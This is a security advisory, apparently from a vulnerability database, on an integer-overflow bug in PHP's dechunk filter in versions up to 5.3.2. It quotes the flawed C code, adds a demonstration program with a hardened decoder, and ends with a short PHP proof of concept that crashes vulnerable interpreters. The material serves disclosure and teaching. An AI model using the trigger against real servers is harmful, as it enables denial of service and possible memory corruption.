Affected Versions:
PHP <= 5.3.2
Vulnerability description:
PHP is a widely used scripting language. It is especially suitable for Web development and can be embedded into HTML.
The php_dechunk() function in PHP's ext/standard/filters.c contains a signedness error in its handling of HTTP chunked streams. Passing an oversized HTTP chunk through the dechunk filter can trigger memory corruption.
The state machine in the new PHP dechunk filter remembers its current state in the following structure:
typedef struct _php_chunked_filter_data {
    php_chunked_filter_state state;
    int chunk_size;
    int persistent;
} php_chunked_filter_data;
chunk_size is stored as a signed int, and the chunk-size decoder accumulates hexadecimal digits straight into it, which is where the problem arises:
case CHUNK_SIZE:
    while (p < end) {
        if (*p >= '0' && *p <= '9') {
            data->chunk_size = (data->chunk_size * 16) + (*p - '0');
        } else if (*p >= 'A' && *p <= 'F') {
            data->chunk_size = (data->chunk_size * 16) + (*p - 'A' + 10);
        } else if (*p >= 'a' && *p <= 'f') {
            data->chunk_size = (data->chunk_size * 16) + (*p - 'a' + 10);
        } else if (data->state == CHUNK_SIZE_START) {
            data->state = CHUNK_ERROR;
            break;
        } else {
            data->state = CHUNK_SIZE_EXT_START;
            break;
        }
        data->state = CHUNK_SIZE;
        p++;
    }
The chunk-size decoder does nothing to prevent integer overflow. A large hexadecimal chunk size that does not fit in a signed 32-bit int wraps to a negative value in the chunk_size state variable, and the signed comparison of the chunk size against the remaining buffer space is then bypassed:
case CHUNK_BODY:
    if (end - p >= data->chunk_size) {
        if (p != out) {
            memmove(out, p, data->chunk_size);
        }
        out += data->chunk_size;
        out_len += data->chunk_size;
        p += data->chunk_size;
Because chunk_size holds a negative value, the check passes and memmove() is asked to copy 2 GB to 4 GB between two heap buffers. This usually only causes a crash, but on a multi-threaded Web server it may also cause memory corruption that can be exploited. However, PHP is rarely used in multi-threaded environments.
Reference:
http://secunia.com/advisories/39573/
http://php-security.org/2010/05/02/mops-2010-003-php-dechunk-filter-signed-comparison-vulnerability/index.html
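The following standalone C program is an added illustration and is not code from PHP or from the advisory. It reduces the decoder's arithmetic and the CHUNK_BODY guard quoted above to two small functions, so the wrap-around of "fffffffe" to -2 and the resulting pass of the length check can be observed directly, and places a bounded, unsigned decoder next to them as the defensive counterpart. The function names and the max_size ceiling are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not PHP's code. Function names and max_size are
 * this example's own. */

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hex_digit(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Mirrors the vulnerable decoder: every hex digit is folded into a 32-bit
 * value with no overflow check. Accumulating in uint32_t keeps this example
 * free of undefined behaviour; the final cast to int reproduces the
 * wrap-around to a negative chunk size that the advisory describes.
 * Returns the number of digits consumed; *out receives the wrapped size. */
int decode_chunk_size_unchecked(const char *p, const char *end, int *out)
{
    uint32_t size = 0;
    const char *start = p;
    while (p < end && hex_digit(*p) >= 0) {
        size = size * 16u + (uint32_t)hex_digit(*p);
        p++;
    }
    *out = (int)size;                /* 0xfffffffe becomes -2 */
    return (int)(p - start);
}

/* The CHUNK_BODY guard as a predicate: remaining stands for `end - p`,
 * chunk_size for the signed state variable. Once chunk_size is negative
 * the comparison is true however little input is actually left. */
int body_check_passes_unchecked(size_t remaining, int chunk_size)
{
    return (ptrdiff_t)remaining >= chunk_size;
}

/* Hardened decoder: accumulates in size_t, rejects an empty digit run and
 * any value exceeding max_size (a caller-chosen ceiling on chunk length).
 * Returns 0 with *out and *next set, or -1 on malformed/oversized input.
 * An unsigned, bounded result cannot slip past a later length check by
 * flipping sign. */
int decode_chunk_size_checked(const char *p, const char *end, size_t max_size,
                              size_t *out, const char **next)
{
    size_t size = 0;
    int ndigits = 0;
    while (p < end && hex_digit(*p) >= 0) {
        size_t d = (size_t)hex_digit(*p);
        if (size > max_size / 16) return -1;   /* size * 16 would exceed max_size */
        size *= 16;
        if (d > max_size - size) return -1;    /* size + d would exceed max_size */
        size += d;
        ndigits++;
        p++;
    }
    if (ndigits == 0) return -1;               /* no chunk size present */
    *out = size;
    *next = p;
    return 0;
}

/* Wrappers over NUL-terminated strings so both decoders can be compared on
 * the same input; the checked wrapper returns -1 when the input is rejected. */
int unchecked_size_of(const char *s)
{
    int v = 0;
    decode_chunk_size_unchecked(s, s + strlen(s), &v);
    return v;
}

long checked_size_or_minus1(const char *s, size_t max_size)
{
    size_t v = 0;
    const char *next = NULL;
    if (decode_chunk_size_checked(s, s + strlen(s), max_size, &v, &next) != 0)
        return -1;
    return (long)v;
}

int main(void)
{
    /* Constructed input modelled on the advisory's proof of concept: an
     * eight-digit chunk size followed by only three bytes of body. */
    const char *chunk = "fffffffe";
    size_t body_left = 3;
    int wrapped = unchecked_size_of(chunk);
    printf("unchecked: chunk_size=%d, body check passes=%d\n",
           wrapped, body_check_passes_unchecked(body_left, wrapped));
    printf("checked, 64 MiB ceiling: %ld\n",
           checked_size_or_minus1(chunk, (size_t)64 << 20));
    printf("checked on \"1a\": %ld\n",
           checked_size_or_minus1("1a", (size_t)64 << 20));
    return 0;
}
```

Run as-is, the program shows the unchecked decoder turning "fffffffe" into -2 and the body check accepting it with three bytes remaining, while the bounded decoder rejects the same digits and still accepts an ordinary chunk size such as "1a".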
Test method:
The programs (methods) provided on this site may be harmful and are intended only for security research and teaching. Use them at your own risk!
<?php
$x = "0fffffffe
XXX";
file_put_contents("file:///tmp/test.dat", $x);
$y = file_get_contents("php://filter/read=dechunk/resource=file:///tmp/test.dat");
echo "here";
?>
SEBUG Security suggestions:
Vendor patch:
PHP
---
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
http://www.php.net